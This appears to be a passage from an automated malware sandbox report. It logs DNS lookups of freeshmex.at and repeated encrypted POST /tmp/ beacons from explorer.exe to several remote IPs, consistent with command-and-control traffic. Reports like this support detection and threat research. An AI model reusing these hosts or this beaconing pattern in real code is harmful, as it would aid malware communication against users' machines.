                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.4497165.135.247.111443C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.4 | 49698 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:28:58.483763933 CET | 148 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://idgtg.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 310
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:28:58.901444912 CET | 148 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:28:58 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 8
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 04 00 00 00 72 e8 87 ed
                                                        Data Ascii: r


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        10 | 192.168.2.4 | 49707 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:12.646313906 CET | 1359 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wtnnoq.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 277
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:13.063014984 CET | 1360 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:12 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        11 | 192.168.2.4 | 49708 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:13.661755085 CET | 1361 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ulhgwivcot.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 270
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:14.547209024 CET | 1362 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:14 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        12 | 192.168.2.4 | 49709 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:14.755305052 CET | 1363 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://pydpo.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 230
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:15.188577890 CET | 1363 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:14 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        13 | 192.168.2.4 | 49710 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:15.417911053 CET | 1365 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ebktpqpafx.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 253
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:16.315767050 CET | 1365 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:15 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        14 | 192.168.2.4 | 49711 | 190.147.188.50 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:16.771595955 CET | 1367 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://asqgcaowns.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 338
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:16.771632910 CET | 1367 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4c 34 fc ee
                                                        Nov 20, 2022 23:29:17.579442978 CET | 1367 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:17 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        15 | 192.168.2.4 | 49712 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:17.825717926 CET | 1368 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wjowxl.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 245
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:17.825717926 CET | 1369 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 41 5b ed f3
                                                        Nov 20, 2022 23:29:18.733083010 CET | 1369 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:18 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        16 | 192.168.2.4 | 49713 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:18.844870090 CET | 1370 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ltpqmt.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 156
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:18.844870090 CET | 1370 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 0d ea e2
                                                        Nov 20, 2022 23:29:19.285669088 CET | 1371 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:19 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        17 | 192.168.2.4 | 49714 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:19.586363077 CET | 1372 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://dlkbyd.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 261
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:19.586421967 CET | 1372 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2c 20 cd f3
                                                        Nov 20, 2022 23:29:20.763540030 CET | 1373 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:20 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        18 | 192.168.2.4 | 49715 | 138.36.3.134 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:20.999356985 CET | 1374 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://bvcqra.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 157
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:20.999810934 CET | 1374 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 25 22 e9 a6
                                                        Nov 20, 2022 23:29:21.939101934 CET | 1375 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:21 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 50
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        19 | 192.168.2.4 | 49717 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:23.322921991 CET | 2008 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://qmtttoldxo.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 157
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:23.322964907 CET | 2008 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 04 6b 2c 90 f4 76 0b 75 4d 0c e8 ec
                                                        Nov 20, 2022 23:29:23.797904015 CET | 2009 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:23 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.4 | 49699 | 175.119.10.231 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:28:59.421587944 CET | 149 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://iatco.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 172
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:28:59.423085928 CET | 150 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7a 00 c4 e4
                                                        Nov 20, 2022 23:29:00.599958897 CET | 150 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:28:59 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        20 | 192.168.2.4 | 49718 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:24.144349098 CET | 2010 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://hubudix.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 295
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:24.144644976 CET | 2010 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2d 51 b3 8f
                                                        Nov 20, 2022 23:29:25.349183083 CET | 2010 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:24 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        21 | 192.168.2.4 | 49719 | 138.36.3.134 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:25.591074944 CET | 2011 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://feciyrtt.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 188
                                                        Host: freeshmex.at
